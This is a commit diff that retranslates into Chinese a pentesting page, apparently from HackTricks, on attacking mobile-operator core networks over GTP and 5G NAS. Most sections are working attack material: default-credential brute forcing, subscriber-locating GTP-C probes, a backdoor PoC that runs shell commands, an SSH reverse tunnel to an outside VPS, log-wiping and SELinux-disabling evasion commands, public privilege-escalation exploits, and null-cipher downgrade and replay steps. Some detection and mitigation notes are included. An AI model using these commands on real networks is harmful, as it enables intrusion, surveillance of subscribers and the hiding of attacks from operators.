Translated ['', 'src/generic-methodologies-and-resources/pentesting-netw

2025-10-10 18:36:50 +00:00 · 2025-09-07 20:09:33 +00:00 · 2025-09-07 20:09:33 +00:00 · 95441a268f
commit 95441a268f
parent 0826b90f6f
1 changed files with 153 additions and 46 deletions
--- a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
@ -1,27 +1,27 @@
-# Telecom Network Exploitation (GTP / Roaming Environments)
+# 电信网络利用 (GTP / 漫游环境)

 {{#include ../../banners/hacktricks-training.md}}

 > [!NOTE]
-> 移动核心协议（GPRS隧道协议 - GTP）通常穿越半信任的GRX/IPX漫游骨干网。由于它们在几乎没有身份验证的情况下通过普通的UDP传输，**在电信边界内的任何立足点通常可以直接访问核心信令平面**。以下笔记收集了在野外观察到的针对SGSN/GGSN、PGW/SGW和其他EPC节点的攻击技巧。
+> 移动核心协议（GPRS Tunnelling Protocol – GTP）通常穿越半受信任的 GRX/IPX 漫游骨干网。由于它们基于明文 UDP 且几乎没有认证，**一旦在运营商边界内获得立足点，通常就能直接访问核心信令平面**。以下笔记汇总了在实战中针对 SGSN/GGSN、PGW/SGW 及其他 EPC 节点观察到的攻击技巧。

-## 1. Recon & Initial Access
+## 1. 侦察与初始访问

-### 1.1  Default OSS / NE Accounts
-一个令人惊讶的大量供应商网络元素出厂时带有硬编码的SSH/Telnet用户，例如`root:admin`、`dbadmin:dbadmin`、`cacti:cacti`、`ftpuser:ftpuser`，……一个专用的字典显著提高了暴力破解的成功率：
+### 1.1  默认 OSS / NE 账户
+大量厂商的网络设备出厂时包含硬编码的 SSH/Telnet 用户，例如 `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, …。专门的口令字典可以显著提高暴力破解的成功率：
 ```bash
 hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
 ```
-如果设备仅暴露管理 VRF，请首先通过跳跃主机进行转发（请参见下面的“SGSN Emu Tunnel”部分）。
+如果设备仅暴露管理 VRF，请先通过 jump host 进行 pivot（见下文 «SGSN Emu Tunnel» 一节）。

-### 1.2  GRX/IPX 内部的主机发现
-大多数 GRX 运营商仍然允许 **ICMP echo** 在骨干网中传输。将 `masscan` 与内置的 `gtpv1` UDP 探测器结合使用，以快速映射 GTP-C 监听器：
+### 1.2  GRX/IPX 内的主机发现
+大多数 GRX 运营商仍然允许在骨干网中使用 **ICMP echo**。将 `masscan` 与内置的 `gtpv1` UDP 探针结合使用，以快速映射 GTP-C 监听器：
 ```bash
 masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
 ```
 ## 2. 枚举订阅者 – `cordscan`

-以下 Go 工具构造 **GTP-C 创建 PDP 上下文请求** 数据包并记录响应。每个回复揭示了当前为查询的 IMSI 提供服务的 **SGSN / MME**，有时还会显示订阅者访问的 PLMN。
+下面的 Go 工具构造 **GTP-C Create PDP Context Request** 数据包并记录响应。每个回复会揭示当前为被查询的 IMSI 提供服务的 **SGSN / MME**，有时还会显示该订阅者访问的 PLMN。
 ```bash
 # Build
 GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
@ -29,22 +29,22 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
 # Usage (typical):
 ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
 ```
-关键标志：
- `--imsi` 目标用户的IMSI
- `--oper` 家乡 / HNI (MCC+MNC)
- `-w`      将原始数据包写入pcap
+关键参数：
+- `--imsi` 目标订户 IMSI
+- `--oper` 归属 / HNI (MCC+MNC)
+- `-w`      将原始数据包写入 pcap

-可以修补二进制文件中的重要常量以扩大扫描范围：
+可以通过修补二进制文件中的重要常量来扩大扫描范围：
 ```
 pingtimeout       = 3   // seconds before giving up
 pco               = 0x218080
 common_tcp_ports  = "22,23,80,443,8080"
 ```
-## 3. 通过 GTP 执行代码 – `GTPDoor`
+## 3. 通过 GTP 的代码执行 – `GTPDoor`

-`GTPDoor` 是一个小型 ELF 服务，**绑定 UDP 2123 并解析每个传入的 GTP-C 数据包**。当有效负载以预共享标签开头时，其余部分会被解密（AES-128-CBC）并通过 `/bin/sh -c` 执行。标准输出/标准错误会在 **Echo Response** 消息中被外泄，以便不创建任何外部会话。
+`GTPDoor` 是一个小型 ELF 服务，**binds UDP 2123 并解析每个传入的 GTP-C 包**。当负载以预共享标签开头时，剩余部分会被解密（AES-128-CBC）并通过 `/bin/sh -c` 执行。stdout/stderr 会被封装并通过 **Echo Response** 消息外发，因此永远不会创建外向的会话。

-最小 PoC 数据包（Python）：
+最小 PoC 数据包 (Python):
 ```python
 import gtpc, Crypto.Cipher.AES as AES
 key = b"SixteenByteKey!"
@ -53,39 +53,39 @@ enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
 print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
 ```
 检测：
-* 任何向 SGSN IP 发送 **不平衡的回声请求** 的主机
-* GTP 版本标志设置为 1，而消息类型 = 1（回声） – 偏离规范
+* 任何主机向 SGSN IP 发送**不成对的 Echo Requests**
+* GTP version flag 被设置为 1 且 message type = 1 (Echo) — 偏离规范

-## 4. 通过核心进行枢转
+## 4. Pivoting Through the Core

 ### 4.1  `sgsnemu` + SOCKS5
-`OsmoGGSN` 提供一个 SGSN 模拟器，能够 **建立与真实 GGSN/PGW 的 PDP 上下文**。 一旦协商完成，Linux 将接收到一个新的 `tun0` 接口，可以从漫游对等体访问。
+`OsmoGGSN` 提供了一个 SGSN 仿真器，能够**向真实的 GGSN/PGW 建立 PDP context**。协商完成后，Linux 会收到一个新的 `tun0` 接口，可从漫游对端访问。
 ```bash
 sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
 -APN internet -c 1 -d
 ip route add 172.16.0.0/12 dev tun0
 microsocks -p 1080 &   # internal SOCKS proxy
 ```
-通过适当的防火墙发夹，这个隧道绕过仅信号的VLAN，直接进入**数据平面**。
+通过合适的 firewall hair-pinning，该隧道可绕过仅用于信令的 VLANs，直接进入 **数据平面**。

-### 4.2  通过53端口的SSH反向隧道
-DNS在漫游基础设施中几乎总是开放的。将内部SSH服务暴露给您的VPS，监听:53，然后从家中返回：
+### 4.2  SSH Reverse Tunnel over Port 53
+DNS 在漫游基础设施中几乎总是开放的。将内部 SSH 服务暴露到你的 VPS，监听 :53，然后稍后从家中回连：
 ```bash
 ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
 ```
-检查 VPS 上是否启用了 `GatewayPorts yes`。
+检查 `GatewayPorts yes` 是否在 VPS 上启用。

-## 5. 隐蔽通道
+## 5. 隐蔽信道

-| 通道 | 传输 | 解码 | 备注 |
-|------|------|------|------|
-| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4 字节密钥 + 14 字节块 (XOR) | 纯被动监听器，无出站流量 |
-| DNS – `NoDepDNS` | UDP 53 | XOR (密钥 = `funnyAndHappy`) 编码在 A 记录八位字节中 | 监视 `*.nodep` 子域 |
-| GTP – `GTPDoor` | UDP 2123 | 私有 IE 中的 AES-128-CBC blob | 与合法的 GTP-C 聊天混合 |
+| 通道 | 传输 | 解码 | 说明 |
+|---------|-----------|----------|-------|
+| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | 纯被动监听器，不产生外发流量 |
+| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | 监听 `*.nodep` 子域名 |
+| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | 与合法的 GTP 通信流量混合 |

-所有植入物都实现了看门狗，**timestomp** 它们的二进制文件，并在崩溃时重新生成。
+所有 implants 都实现了 watchdogs，会 **timestomp** 它们的二进制文件，并在崩溃后重新启动。

-## 6. 防御规避备忘单
+## 6. 防御规避 速查表
 ```bash
 # Remove attacker IPs from wtmp
 utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
@ -100,7 +100,7 @@ printf '\0' > /proc/$$/comm    # appears as [kworker/1]
 touch -r /usr/bin/time /usr/bin/chargen   # timestomp
 setenforce 0                              # disable SELinux
 ```
-## 7. 在遗留 NE 上的权限提升
+## 7. 遗留 NE 的权限提升
 ```bash
 # DirtyCow – CVE-2016-5195
 gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
@ -111,30 +111,137 @@ python3 PwnKit.py
 # Sudo Baron Samedit – CVE-2021-3156
 python3 exploit_userspec.py
 ```
-清理提示：
+清理提示:
 ```bash
 userdel firefart 2>/dev/null
 rm -f /tmp/sh ; history -c
 ```
 ## 8. 工具箱

-* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – 在前面的章节中描述的自定义工具。
-* `FScan` : 内部网络 TCP 扫描 (`fscan -p 22,80,443 10.0.0.0/24`)
+* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – 自定义工具，前文已描述。
+* `FScan` : 内网 TCP 扫描 (`fscan -p 22,80,443 10.0.0.0/24`)
 * `Responder` : LLMNR/NBT-NS 恶意 WPAD
-* `Microsocks` + `ProxyChains` : 轻量级 SOCKS5 代理
-* `FRP` (≥0.37) : NAT 穿透 / 资产桥接
+* `Microsocks` + `ProxyChains` : 轻量级 SOCKS5 pivoting
+* `FRP` (≥0.37) : NAT traversal / 资产桥接
+
+## 9. 5G NAS 注册攻击: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
+
+5G 注册过程在 NGAP 之上的 NAS (Non-Access Stratum) 上运行。在 Security Mode Command/Complete 激活 NAS 安全之前，初始消息是未认证且未加密的。这个安全前窗口在你能够观察或篡改 N2 流量时（例如，位于核心内的中间路径、恶意 gNB，或测试台）提供了多条攻击路径。
+
+注册流程（简化）：
+- Registration Request: UE 发送 SUCI（加密的 SUPI）和能力。
+- Authentication: AMF/AUSF 发送 RAND/AUTN；UE 返回 RES*。
+- Security Mode Command/Complete: NAS 完整性和加密被协商并激活。
+- PDU Session Establishment: IP/QoS 设置。
+
+实验室搭建建议（非 RF）：
+- Core: Open5GS 默认部署足以重现流程。
+- UE: 模拟器或测试 UE；使用 Wireshark 解码。
+- Active tooling: 5GReplay（在 NGAP 内捕获/修改/重放 NAS），Sni5Gect（实时嗅探/打补丁/注入 NAS，无需启动完整的恶意 gNB）。
+- Useful display filters in Wireshark:
+- ngap.procedure_code == 15 (InitialUEMessage)
+- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
+
+### 9.1 标识符隐私：SUCI failures exposing SUPI/IMSI
+预期：UE/USIM 必须发送 SUCI（使用归属网络公钥加密的 SUPI）。在 Registration Request 中发现明文 SUPI/IMSI 表明存在隐私缺陷，可能导致持久的用户跟踪。
+
+如何测试：
+- 捕获 InitialUEMessage 中的第一个 NAS 消息并检查 Mobile Identity IE。
+- Wireshark 快速检查：
+- 它应该解码为 SUCI，而不是 IMSI。
+- 过滤示例：`nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` 应存在；缺失且出现 `imsi` 则表明泄露。
+
+需要收集：
+- 如果暴露，记录 MCC/MNC/MSIN；按 UE 日志并跨时间/地点追踪。
+
+缓解措施：
+- 强制只允许 SUCI 的 UE/USIM；对初始 NAS 中的任何 IMSI/SUPI 发出告警。
+
+### 9.2 能力降级到空算法 (EEA0/EIA0)
+背景：
+- UE 在 Registration Request 的 UE Security Capability IE 中通告支持的 EEA（加密）和 EIA（完整性）。
+- 常见映射：EEA1/EIA1 = SNOW3G，EEA2/EIA2 = AES，EEA3/EIA3 = ZUC；EEA0/EIA0 为 null 算法。
+
+问题：
+- 由于 Registration Request 未受完整性保护，中间路径攻击者可以清除能力位，迫使在 Security Mode Command 时选择 EEA0/EIA0。一些实现错误地在紧急服务之外允许 null 算法。
+
+攻击步骤：
+- 截获 InitialUEMessage 并修改 NAS UE Security Capability，使其只通告 EEA0/EIA0。
+- 使用 Sni5Gect 钩取 NAS 消息并在转发前打补丁能力位。
+- 观察 AMF 是否接受 null 加密/完整性并在 Security Mode 完成时使用 EEA0/EIA0。
+
+验证/可视性：
+- 在 Wireshark 中，确认 Security Mode Command/Complete 后选定的算法。
+- 示例被动嗅探器输出：
+```
+Encyrption in use [EEA0]
+Integrity in use [EIA0, EIA1, EIA2]
+SUPI (MCC+MNC+MSIN) 9997000000001
+```
+Mitigations (must):
+- Configure AMF/policy to reject EEA0/EIA0 except where strictly mandated (e.g., emergency calls).
+- Prefer enforcing EEA2/EIA2 at minimum; log and alarm on any NAS security context that negotiates null algorithms.
+
+### 9.3 初始注册请求的重放（pre-security NAS）
+由于初始 NAS 缺乏完整性和新鲜性，捕获的 InitialUEMessage+Registration Request 可以被重放到 AMF。
+
+PoC rule for 5GReplay to forward matching replays:
+```xml
+<beginning>
+<property value="THEN"
+property_id="101"
+type_property="FORWARD"
+description="Forward InitialUEMessage with Registration Request">
+
+<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
+<event value="COMPUTE"
+event_id="1"
+description="Trigger: InitialUEMessage"
+boolean_expression="ngap.procedure_code == 15"/>
+
+<!-- Context match on NAS Registration Request (message_type == 65) -->
+<event value="COMPUTE"
+event_id="2"
+description="Context: Registration Request"
+boolean_expression="nas_5g.message_type == 65"/>
+
+</property>
+</beginning>
+```
+观察要点：
+- AMF 是否接受重放并继续进行认证；缺乏新鲜性/上下文验证表明存在风险。
+
+缓解措施：
+- 在 AMF 强制实施重放保护/上下文绑定；对每个 GNB/UE 进行速率限制和关联。
+
+### 9.4 Tooling pointers (reproducible)
+- Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS.
+- Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
+- 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
+- Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.
+
+### 9.5 防御检查表
+- 持续检查 Registration Request 是否包含明文 SUPI/IMSI；封堵违规设备/USIM。
+- 拒绝 EEA0/EIA0，除非用于严格限定的紧急程序；至少要求使用 EEA2/EIA2。
+- 检测流氓或配置错误的基础设施：未授权的 gNB/AMF、异常的 N2 对端。
+- 对导致 null 算法或 InitialUEMessage 频繁重放的 NAS 安全模式发出告警。

 ---
 ## 检测思路
-1. **任何设备除了 SGSN/GGSN 建立 Create PDP Context Requests**。
-2. **接收来自内部 IP 的非标准端口 (53, 80, 443) 的 SSH 握手**。
-3. **频繁的 Echo 请求没有相应的 Echo 响应** – 可能表明 GTPDoor 信标。
-4. **高频率的 ICMP 回显应答流量，带有大的非零标识符/序列字段**。
+1. **任何非 SGSN/GGSN 的设备发起 Create PDP Context Requests**。
+2. **来自内部 IP 的 SSH 握手出现在非标准端口（53、80、443）**。
+3. **频繁的 Echo Requests 而无对应的 Echo Responses** – 可能表示 GTPDoor 信标。
+4. **具有较大且非零标识符/序列字段的高速 ICMP echo-reply 流量**。
+5. 5G：**InitialUEMessage 携带的 NAS Registration Requests 从相同端点重复出现**（重放信号）。
+6. 5G：**在非紧急情境下 NAS Security Mode 协商 EEA0/EIA0**。

-## 参考文献
+## 参考资料

- [Palo Alto Unit42 – 全球电信网络的渗透](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 – GPRS 隧道协议 (v16.4.0)
+- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
+- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
 - 3GPP TS 29.281 – GTPv2-C (v17.6.0)
+- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
+- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
+- 3GPP TS 33.501 – Security architecture and procedures for 5G System

 {{#include ../../banners/hacktricks-training.md}}